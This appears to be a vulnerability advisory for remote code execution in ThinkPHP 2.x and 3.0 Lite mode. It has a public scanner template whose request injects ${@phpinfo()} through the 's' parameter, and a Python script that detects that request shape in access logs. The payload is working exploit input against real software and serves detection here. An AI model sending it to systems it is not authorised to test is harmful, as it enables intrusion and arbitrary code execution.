thinkphp-2-rce: ThinkPHP 2 3 's' Parameter RCE

Date: 2025-09-01 | Affected software: ThinkPHP 2 | PoC: public

Vulnerability description

Remote code execution in ThinkPHP 2.x and in ThinkPHP 3.0 running in Lite mode.

PoC code [public]

id: thinkphp-2-rce

info:
  name: ThinkPHP 2 3 's' Parameter RCE
  author: dr_set
  severity: critical
  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce

rules:
  r0:
    request:
      method: GET
      path: /index.php?s=/index/index/name/$%7B@phpinfo()%7D
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'PHP Extension') && 
      response.body.bcontains(b'PHP Version') && 
      response.body.bcontains(b'ThinkPHP')
expression: r0()
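
A log check for the request shape that rule r0 above sends, as an added example (not part of the original template or of ThinkPHP): it flags access-log entries whose `s` query parameter contains `${...}` after percent-decoding, including double-encoded forms. The log lines, the combined log format and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2025:10:00:01 +0000] "GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1" 200 81234',
    '198.51.100.8 - - [01/Sep/2025:10:00:02 +0000] "GET /index.php?s=/index/index/name/alice HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Sep/2025:10:00:03 +0000] "GET /index.php?s=/a/b/c/%2524%257Bx%257D HTTP/1.1" 200 700',
    '198.51.100.10 - - [01/Sep/2025:10:00:04 +0000] "GET /static/app.js?v=${build} HTTP/1.1" 404 0',
]

LINE_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXPR_RE = re.compile(r"\$\{.*?\}")  # "${...}" expression syntax, as in the rule's path


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (bounded) so %2524%257B is also seen as ${."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def expression_in_s_param(target):
    """Return the first ${...} found in the 's' query parameter, else None."""
    query = urlsplit(target).query
    # parse_qs performs one round of percent-decoding; fully_decode handles the rest.
    for value in parse_qs(query, keep_blank_values=True).get("s", []):
        match = EXPR_RE.search(fully_decode(value))
        if match:
            return match.group(0)
    return None


def scan(lines):
    """Return (client, expression) for each log line whose 's' parameter carries ${...}."""
    hits = []
    for line in lines:
        parsed = LINE_RE.search(line)
        if not parsed:
            continue
        expr = expression_in_s_param(parsed.group("target"))
        if expr:
            hits.append((parsed.group("client"), expr))
    return hits
```

The check only covers the `s` query-parameter form shown in the rule; `${...}` in other parameters, such as the cache-busting value in the last sample line, is deliberately not flagged.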
